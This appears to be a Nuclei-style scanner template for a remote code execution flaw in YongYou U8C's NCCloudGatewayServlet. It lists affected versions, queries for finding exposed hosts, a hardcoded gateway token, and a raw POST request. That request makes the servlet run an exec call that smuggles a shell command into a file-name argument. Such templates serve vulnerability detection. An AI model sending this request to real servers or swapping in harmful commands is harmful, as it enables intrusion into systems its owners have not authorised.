id: yongyou-u8c-nccloudgatewayservlet-rce

info:
  name: YongYou U8C NCCloudGatewayServlet RCE
  author: adeljck
  severity: critical
  description: YongYou U8C NCCloudGatewayServlet RCE
  tags: yongyou, exec, rce
  metadata:
    vendor: yonyou
    product: u8c
    hunter-query: title:"U8C"
    fofa-query: app="用友-U8C"
    version: 5.0,5.01,5.011,5.02,5.3,5.5,5.6,5.7,5.75,6.0,6.1,6.3

http:
  - raw:
      - |
        POST /service/NCCloudGatewayServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
        Content-Type: application/json
        gatewaytoken:TJ6RT-3FVCB-DPYP8-XF7QM-96FV3

        {
          "serviceInfo": {
            "serviceClassName": "com.ufida.zior.console.IActionInvokeService",
            "serviceMethodName": "exec",
            "serviceMethodArgInfo": [
              {
                "agg": false,
                "isArray": false,
                "isPrimitive": true,
                "argType": { "body": "java.lang.String" },
                "argValue": { "body": "nc.bs.pub.util.ProcessFileUtils" }
              },
              {
                "agg": false,
                "isArray": false,
                "isPrimitive": true,
                "argType": { "body": "java.lang.String" },
                "argValue": { "body": "openFile" }
              },
              {
                "agg": false,
                "isArray": false,
                "isPrimitive": false,
                "argType": { "body": "java.lang.String" },
                "argValue": {
                  "body": "damn.txt \"|echo 1\""
                }
              }
            ]
          }
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - '"agg"\s*:\s*false'
